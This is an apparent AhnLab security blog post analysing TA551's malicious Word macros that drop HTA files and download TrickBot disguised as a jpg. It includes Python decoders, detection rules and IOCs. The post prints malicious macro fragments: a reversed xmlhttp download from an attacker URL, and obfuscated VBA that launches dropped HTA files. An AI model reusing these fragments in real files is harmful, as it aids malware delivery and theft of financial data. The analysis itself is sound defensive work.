Continuously Changing Malicious Word Macro Being Distributed – Trend of TA551

The ASEC analysis team has been continuously posting information about malicious macro files on this blog and urging users to take caution. This post introduces a type of Word macro file recently distributed by the attack group TA551, which has been changing on average about once a week.

To distribute malware, the group usually sends documents containing malicious macros by email. The way the DOC file operates is unchanged: enabling the macro drops an HTA file, which then downloads additional malware. What changes is the type of malware that is ultimately downloaded.

Figure 1. Operation method of malicious DOC macro distributed by TA551

The following is an explanation of how the malicious macro in the diagram above works.

The attacker sends an email whose attachment is a malicious MS Word document. Once the recipient opens the email, downloads the attachment, and runs the macro, the malicious HTA file is dropped. Code within the HTA file downloads additional malware from an external URL. If that URL is still live, the final malware the attacker intended to distribute is downloaded and starts running.

Figure 2. Names of DOC files, HTA, and DLL used in distributing TrickBot malware

The table above lists the names of the malicious DOC files used to distribute TrickBot this time and of the dropped HTA files (the DLL files use the same names).

The purpose behind distributing TrickBot has not changed much, and neither has the way the macro code operates in the altered malicious macro files that the TA551 group keeps using. The notable change is in the final payload: TA551 had steadily distributed IcedID since last year, but the malware ultimately downloaded now varies slightly.

Figure 3. Behaviors that are shown when enabling DOC macro (AhnLab RAPIT)

[document.xml] – excerpt

eslaF ,"huDSHMPsgn=hcraes&xt6X4fLT=di&BPHSK=resu&sSW7qpNxMucIcoxFPTJ=jibxO&00oYo19C=hcraes&9vGttM=dic&64BBY6eIrpNf1DyB=XhF&hSlYk=resu?1uzam/NpGbPSg3Ddn55UEAB0gi62SxY3C48ybaZA/sFOKURIghF2uY7XcTM6FrDEGxffw/adda/moc.grebotcotseb//:ptth" ,"TEG" nepO.ptthlmx
2 ,"gpj.neercSnoitpac\atadmargorp\:c" eliFoTevaS.maerts

[Macro Code] – excerpt

Attribute VB_Name = "listboxArray"
' Module 1: assembles the path c:\programdata\vbaQueryCount.hta from fragments and launches it via explorer
Function templateCCurr(removeDocClass)
' Shell("explorer c:\programdata\vbaQueryCount.hta") opens the dropped HTA with its default handler
Debug.Print Shell("" + genericLnkResponse("explorer "))
End Function
Function genericLnkResponse(removeDocClass, Optional dateLibsW = "c:\progra", Optional btnLocal = "ta")
' The full path never appears as one literal; it is concatenated from optional-argument defaults
genericLnkResponse = removeDocClass & dateLibsW & "mdata\vbaQueryCount.h" & btnLocal
End Function
Function initTitle(arr As Variant)
' Decodes a numeric array with the single-byte XOR key 100 into the HTA text
' Note the loop starts at index 1, so an array with lower bound 0 has its first element skipped
Dim out As String
out = ""
For cnt = 1 To UBound(arr)
out = out & Chr(arr(cnt) Xor 100)
Next
initTitle = out
End Function
Attribute VB_Name = "captionO"
' Module 2: a later variant of the same logic with a different HTA path, launcher (cmd /c) and XOR key
Function lnkObject(queryArray)
' Shell("cmd /c c:\\users\\public\\winSelBefore.hta")
Shell singleLocal("cmd /c ")
End Function
Function singleLocal(queryArray, Optional listboxLng = "c:\\users\\public\\winSelBefore.h", Optional oOSize = "t", Optional optionDRef = "a")
singleLocal = queryArray & listboxLng & "" & oOSize & optionDRef
End Function
Function indexDocTmp(arr As Variant)
' Same decoder as initTitle, with XOR key 101 and a null character as the initial output value
Dim out As String
out = vbNullChar
For cnt = 1 To UBound(arr)
out = out & Chr(arr(cnt) Xor 101)
Next
indexDocTmp = out
End Function

Looking at the macro code of each version that shows changes, the pattern is to use the data in the initially obfuscated document.xml object to create an HTA that is obfuscated a second time. The samples show that the way the commands executing the HTA file are assembled can change slightly. In certain types, the data in document.xml is simply the text written in reverse order, as shown above.
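As an added example (not code from the ASEC post or from the malware), the following Python helpers undo the two obfuscation layers the excerpt above relies on: the reversed strings stored in document.xml, and the single-byte XOR arrays decoded by initTitle/indexDocTmp with keys 100 and 101. The function and variable names, the marker list, and all sample inputs are constructed for this demonstration; the key-recovery step goes beyond the excerpt by brute-forcing the key when the macro constant is not at hand, and it ranks candidates by known payload tokens because printability alone is ambiguous for short buffers.

```python
import string

# Printable ASCII byte values, used to rank candidate XOR keys.
PRINTABLE = set(string.printable.encode("ascii"))

# Case-sensitive tokens a decoded HTA/VBScript payload is likely to contain (constructed list).
MARKERS = ("CreateObject", "ActiveXObject", "<script", "WScript", "http")


def unreverse(text):
    """document.xml layer: the stored text is simply written backwards."""
    return text[::-1]


def xor_decode(arr, key, skip_first=True):
    """Mirror of initTitle/indexDocTmp: Chr(arr(cnt) Xor key) over the array.

    The VBA loop is `For cnt = 1 To UBound(arr)`; for an array with lower
    bound 0 that skips arr(0), so the decoder skips it too unless told otherwise.
    """
    values = arr[1:] if skip_first else arr
    return "".join(chr(v ^ key) for v in values)


def printable_ratio(s):
    """Fraction of characters that are printable ASCII."""
    if not s:
        return 0.0
    return sum(1 for c in s if ord(c) in PRINTABLE) / len(s)


def recover_key(arr, skip_first=True):
    """Brute-force the one-byte XOR key when the macro constant is unknown.

    Several keys map letters to letters, so candidates are ranked first by
    marker hits and only then by printable ratio. Returns (key, decoded_text).
    """
    def rank(k):
        s = xor_decode(arr, k, skip_first)
        return (sum(m in s for m in MARKERS), printable_ratio(s))
    best = max(range(256), key=rank)
    return best, xor_decode(arr, best, skip_first)


def encode_like_macro(plain, key):
    """Build an array in the macro's layout (dummy element at index 0) so the
    decoders can be exercised on constructed input."""
    return [0] + [ord(c) ^ key for c in plain]


# Constructed samples (not taken from the malware): a reversed file path and
# two XOR-encoded fragments using the excerpt's keys 100 and 101.
REVERSED_SAMPLE = "gpj.elpmas\\atadmargorp\\:c"
SAMPLE_ARRAY_100 = encode_like_macro('Set x = CreateObject("Scripting.FileSystemObject")', 100)
SAMPLE_ARRAY_101 = encode_like_macro('var sh = new ActiveXObject("WScript.Shell");', 101)

if __name__ == "__main__":
    print(unreverse(REVERSED_SAMPLE))
    for arr in (SAMPLE_ARRAY_100, SAMPLE_ARRAY_101):
        key, text = recover_key(arr)
        print(key, text)
```

In practice the numeric array is copied out of the macro (or out of document.xml) into a Python list and passed to recover_key; the skip_first flag matters because the real decoders start at index 1, and decoding from index 0 prepends one stray character.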

Figure 4. Malicious DOC macro file

Figure 5. Part of dropped HTA file after macro is run

Figure 6. Result of unobfuscating part of HTA data

In the recently distributed sample, enabling the macro in the Word file that contains the malicious macro (Figure 2) drops the HTA file from Figure 3 to the C:\ProgramData path. Unobfuscating part of the code within the HTA file reveals the following code, which downloads additional malware (vbaQueryCount.jpg) from the external malicious URL and saves it to the C:\Users\Public path. The downloaded jpg file is not an image file but a DLL, which is executed with regsvr32.exe.

Figure 7. TrickBot malware downloaded after disguising itself as an image file with jpg extension

Figure 8. Ultimate dll file operated by TrickBot (AhnLab RAPIT)

TrickBot is the malware ultimately downloaded; it attempts malicious behaviors such as stealing sensitive information from the user's PC, including web browser and financial transaction data. As shown in Figure 8 (a process tree provided by AhnLab RAPIT, a malware auto-analysis infrastructure), the malware collects information about the infected PC using normal processes such as ipconfig.exe, net.exe, and nltest.exe.
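The chain just described (Word spawning a script host, regsvr32 loading a "jpg" from C:\Users\Public, then a burst of ipconfig/net/nltest) is visible in ordinary process-creation telemetry. The following is an added example written for this post, not AhnLab's detection logic or the post's own code: it runs three rules over constructed Sysmon-style events and adds a header check that identifies a PE file regardless of its extension. All event rows, byte strings, rule names and thresholds are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed process-creation telemetry (not real logs), shaped like a Sysmon
# event 1 record: (timestamp, pid, parent pid, image path, command line).
# Rows 100-106 mimic the chain in the post; rows 200-201 are benign noise.
EVENTS = [
    ("10:00:01", 100, 1,   r"C:\Program Files\Microsoft Office\WINWORD.EXE", "WINWORD.EXE /n invoice.doc"),
    ("10:00:05", 101, 100, r"C:\Windows\System32\cmd.exe", r"cmd /c c:\users\public\winSelBefore.hta"),
    ("10:00:06", 102, 101, r"C:\Windows\System32\mshta.exe", r"mshta.exe c:\users\public\winSelBefore.hta"),
    ("10:00:09", 103, 102, r"C:\Windows\System32\regsvr32.exe", r"regsvr32 /s c:\users\public\vbaQueryCount.jpg"),
    ("10:00:12", 104, 103, r"C:\Windows\System32\ipconfig.exe", "ipconfig /all"),
    ("10:00:13", 105, 103, r"C:\Windows\System32\net.exe", "net view /all"),
    ("10:00:14", 106, 103, r"C:\Windows\System32\nltest.exe", "nltest /domain_trusts"),
    ("10:05:00", 200, 1,   r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
    ("10:05:01", 201, 200, r"C:\Windows\System32\regsvr32.exe", r"regsvr32 /s C:\Windows\System32\example.dll"),
]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "mshta.exe", "wscript.exe", "cscript.exe", "explorer.exe"}
RECON = {"ipconfig.exe", "net.exe", "nltest.exe", "whoami.exe", "systeminfo.exe"}
IMAGE_EXT = re.compile(r"\.(jpe?g|png|gif|bmp)(\s|$|\")", re.IGNORECASE)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (pid, rule, detail) tuples for the three behaviours of the chain."""
    by_pid = {e[1]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e[2]].append(e)

    def has_office_ancestor(pid, depth=6):
        # Walk up the parent chain a bounded number of steps.
        while depth and pid in by_pid:
            parent = by_pid.get(by_pid[pid][2])
            if parent is None:
                return False
            if basename(parent[3]) in OFFICE:
                return True
            pid, depth = parent[1], depth - 1
        return False

    findings = []
    for _ts, pid, ppid, image, cmd in events:
        name = basename(image)
        parent = by_pid.get(ppid)
        pname = basename(parent[3]) if parent else ""
        # Rule 1: an Office application spawning a shell or script host.
        if pname in OFFICE and name in SCRIPT_HOSTS:
            findings.append((pid, "office_spawned_script_host", f"{pname} -> {name}"))
        # Rule 2: regsvr32 asked to load a "DLL" whose name carries an image extension.
        if name == "regsvr32.exe" and IMAGE_EXT.search(cmd):
            findings.append((pid, "regsvr32_image_extension", cmd))
        # Rule 3: three or more recon tools under one parent that descends from Office.
        recon_kids = {basename(c[3]) for c in children[pid]} & RECON
        if len(recon_kids) >= 3 and has_office_ancestor(pid):
            findings.append((pid, "recon_burst_from_office_lineage", ",".join(sorted(recon_kids))))
    return findings


def looks_like_pe(data):
    """True when the bytes carry an MZ/PE header, whatever the file extension says."""
    if len(data) < 0x44 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


# Constructed byte strings: a minimal MZ stub whose e_lfanew points at a PE
# signature (what the fake "jpg" really is), and a genuine JPEG SOI header.
FAKE_JPG_DLL = b"MZ" + b"\0" * 0x3A + (0x40).to_bytes(4, "little") + b"PE\0\0" + b"\0" * 16
REAL_JPG_HEADER = b"\xff\xd8\xff\xe0" + b"\0" * 64

if __name__ == "__main__":
    for finding in detect(EVENTS):
        print(finding)
    print("fake jpg is PE:", looks_like_pe(FAKE_JPG_DLL), "| real jpg is PE:", looks_like_pe(REAL_JPG_HEADER))
```

Rule 3 is deliberately tied to an Office ancestor so that an administrator running ipconfig, net and nltest from a console does not trigger it; the file header check is the complement to Rule 2 for hosts where only file-creation events, not command lines, are available.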

The recent trend in changes shows that the malware that ultimately runs has shifted to financial info-stealing malware, in the following types:

  • IcedID download type
  • Ursnif download type
  • Trickbot download type

Users should refrain from opening emails from unknown sources and should not run or enable macros in downloaded attachments. If the document program's security level is set to low, macros may run automatically without any notification, so users should keep the security level high to prevent unintended features from running.

Also, users are advised to update the anti-malware engine pattern to its latest version.

AhnLab’s anti-malware product, V3, detects and blocks the types of malicious files introduced in this post (DOC, HTA, DLL, etc.) using the following aliases.

[File Detection]
Downloader/DOC.TA551
Downloader/DOC.TA551.S1535
Downloader/DOC.Agent
Downloader/DOC.Generic
Dropper/MSOffice.Generic
Downloader/HTA.TA551
Downloader/Script.Agent
Trojan/JS.TrickBot
Trojan/Win.Generic.C4531900

[IOC]
47e580efca5c42565af7b214bd601d80
24d2245c3657caba1e3a3bbe14e0cc25
35ff8c7a28c72c64e0f5f9fc75e9a4aa
8333d57a044a01797f6e120b4c1b1dc2
97b1bb23455fb9a9607f37df266459fc
ebda58ce60415f80968457e8548b9fec
b736f5dc071bb3d2bb3f4f9e2e0155d1
86ddb37be7e54511c8761308c1d7fa91
2478032eded8e67228c05e8e1fdc7a89
hxxp://championriced[.]com
hxxp://app.bighomegl[.]at

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
